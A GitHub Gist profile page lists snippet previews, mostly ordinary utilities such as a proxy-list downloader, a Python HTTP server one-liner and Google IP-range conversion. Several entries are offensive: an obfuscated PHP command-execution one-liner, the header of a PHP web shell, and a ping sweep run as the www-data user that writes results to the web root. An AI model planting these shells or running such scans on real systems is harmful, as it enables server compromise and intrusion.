Skip to content

Instantly share code, notes, and snippets.

View ricardomaia's full-sized avatar
:octocat:
/** No comments */

Ricardo Maia ricardomaia

:octocat:
/** No comments */
25 followers · 21 following
View GitHub Profile
@ricardomaia
ricardomaia / update_proxies.sh
Created March 9, 2024 01:14
Creating a file with a list of proxies
#!/usr/bin/env bash
# Download proxies list
curl -k https://raw.githubusercontent.com/TheSpeedX/SOCKS-List/master/http.txt -o proxy_list.txt
sed -i -e 's/^/http:\/\//' proxy_list.t
@ricardomaia
ricardomaia / one_line_http_server.md
Created March 9, 2024 01:10
One line Python HTTP server 
python -m http.server 8080 --bind 0.0.0.0 --directory ./
@ricardomaia
ricardomaia / explorer.js
Created March 8, 2024 20:48
Expose current directory on web
const express = require('express');
const fs = require('fs');
const app = express();
const port = 3000;
app.get('/', (req, res) => {
fs.readdir('.', (err, files) => {
if (err) {
res.send('Erro ao ler diretório');
@ricardomaia
ricardomaia / Google Network IP Ranges.md
Last active March 1, 2023 15:57
Download and transform the list of Google IP ranges from JSON to CSV

Download and transform the list of Google IP ranges from JSON to CSV using curl, jq and sed.

curl https://www.gstatic.com/ipranges/goog.json | \
jq -r '.prefixes[].ipv4Prefix, .prefixes[].ipv6Prefix |  select (. != null)' | sed 's/^\|$/"/g' | paste -sd, - \
&& curl https://www.gstatic.com/ipranges/cloud.json | \
jq -r '.prefixes[].ipv4Prefix, .prefixes[].ipv6Prefix | select (. != null)' | sed 's/^\|$/"/g'| paste -sd, - \
> google-ranges.csv
@ricardomaia
ricardomaia / rev_shell.php
Created January 31, 2023 17:06 — forked from terjanq/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@ricardomaia
ricardomaia / webshell.php
Created November 20, 2022 15:23
webshell.php
<!-- Project Name : PHP Web Shell -->
<!-- Version : 0.01 -->
<!-- First development date : 2012/07/31 -->
<!-- This Version development date : 2012/07/31 -->
<!-- language : html, css, javascript, php -->
<!-- Developer : majorPE -->
<!-- Web site : http://blog.naver.com/xornrbboy -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
@ricardomaia
ricardomaia / network_scan.md
Created October 19, 2022 17:45
Network scan with shell script and www-data user

Network scan with shell script and www-data user

PING IPs

for i in $(seq 1 10); 
  do ping -c1 -t 1 192.168.0.$i | grep -v '100% packet loss' | grep PING | awk '{print $2}' >> /var/www/html/ips.txt; 
  done;

Probe TCP Ports

@ricardomaia
ricardomaia / exfiltration.md
Last active August 21, 2023 17:14
Eavesdropping / Data exfiltration

Eavesdropping / Data exfiltration

My collection of eavesdropping / data exfiltration videos from air gapped computers.

A Practical Deep Learning-Based Acoustic Side Channel Attack on Keyboards

https://arxiv.org/pdf/2308.01074.pdf

@ricardomaia
ricardomaia / Search Operators.md
Created June 2, 2022 14:16
Google Advanced Search - https://www.google.com/advanced_search

Google Advanced Search

https://www.google.com/advanced_search

Operators

"" Use this to do an exact-match search.

OR Search for this OR that. This will return results related to the two terms or both.

@ricardomaia
ricardomaia / multiple_selections.gs
Created May 24, 2022 15:37
Multiple Selections on Google Spreadsheets
/**
@OnlyCurrentDoc
Ref: https://spreadsheetpoint.com/multiple-selection-drop-down-google-sheets/
*/
function onEdit(e) {
var oldValue;
var newValue;
var ss=SpreadsheetApp.getActiveSpreadsheet();
var activeCell = ss.getActiveCell();
if(activeCell.getColumn() == 3 && activeCell.getRow() >= 4 && ss.getSheetName != "Categorias" ) {